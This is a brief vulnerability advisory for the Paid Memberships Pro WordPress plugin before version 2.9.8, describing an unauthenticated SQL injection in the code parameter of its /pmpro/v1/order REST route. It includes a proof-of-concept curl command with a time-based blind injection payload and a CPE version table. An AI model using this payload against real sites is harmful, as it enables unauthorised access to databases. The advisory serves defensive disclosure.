The plugin does not properly sanitise and escape the code parameter before using it in a SQL statement via the /pmpro/v1/order REST route, leading to a SQL injection exploitable by unauthenticated users
curl “https://example.com/?rest_route=/pmpro/v1/order&code;=a’ OR (SELECT 1 FROM (SELECT(SLEEP(2)))a)–%20-”
CPE | Name | Operator | Version |
---|---|---|---|
paid-memberships-pro | lt | 2.9.8 |